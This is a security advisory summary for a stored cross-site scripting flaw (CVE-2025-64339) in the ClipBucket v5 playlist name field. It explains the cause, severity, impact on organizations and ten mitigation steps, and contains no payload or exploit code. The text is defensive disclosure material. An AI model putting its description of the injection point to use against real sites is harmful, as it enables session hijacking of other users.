CVE-2025-64339 is a stored Cross-site Scripting (XSS) vulnerability identified in ClipBucket v5, an open-source video sharing platform developed by MacWarrior. The vulnerability exists in versions 5.5.2-#146 and earlier within the Manage Playlists feature, specifically in the Playlist Name field. An authenticated user with low privileges can craft a playlist name containing malicious HTML or JavaScript code. Because the application fails to properly neutralize or escape this input when rendering playlist detail and listing pages, the injected script executes in the browsers of all users who view these pages, including administrators. This can lead to arbitrary JavaScript execution, enabling attackers to perform actions such as session hijacking, cookie theft, or executing further attacks within the context of the victim’s browser session. The vulnerability does not require elevated privileges beyond authentication, but does require user interaction (viewing the malicious playlist). The CVSS 4.0 base score is 7.2 (high), reflecting the network attack vector, low attack complexity, no privileges required beyond low-level authentication, and partial user interaction. The vulnerability was publicly disclosed on November 7, 2025, and fixed in version 5.5.2-#147. No known exploits are currently reported in the wild. The root cause is improper input validation and output encoding, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation).

For European organizations, this vulnerability poses a significant risk to platforms using ClipBucket v5 for video sharing or community engagement. Exploitation can lead to compromise of user accounts, including administrative accounts, through session hijacking or credential theft. This can result in unauthorized access to sensitive data, platform defacement, or further lateral movement within the organization’s network. The impact extends to loss of user trust, reputational damage, and potential regulatory consequences under GDPR if personal data is compromised. Since the vulnerability allows arbitrary script execution in the context of the victim’s browser, it can also be leveraged to deliver malware or phishing attacks. Organizations relying on ClipBucket for customer-facing services or internal collaboration are particularly vulnerable. The requirement for an authenticated low-privileged user to inject the payload limits the attack surface but does not eliminate risk, especially in environments with many registered users or weak account controls.

1. Upgrade immediately to ClipBucket v5 version 5.5.2-#147 or later, where the vulnerability is patched. 2. Implement strict input validation on the Playlist Name field to reject or sanitize HTML and JavaScript content. 3. Apply proper output encoding/escaping on all user-supplied data rendered in web pages to prevent script execution. 4. Enforce least privilege principles to limit the number of users who can create or manage playlists. 5. Monitor logs for unusual playlist creation or modification activities that could indicate exploitation attempts. 6. Educate users and administrators about the risks of XSS and encourage cautious interaction with user-generated content. 7. Consider deploying Web Application Firewalls (WAFs) with rules to detect and block XSS payloads targeting ClipBucket. 8. Conduct regular security assessments and code reviews focusing on input handling and output rendering. 9. If immediate upgrade is not possible, disable or restrict the Manage Playlists feature to trusted users only. 10. Review session management and implement HttpOnly and Secure flags on cookies to mitigate session hijacking.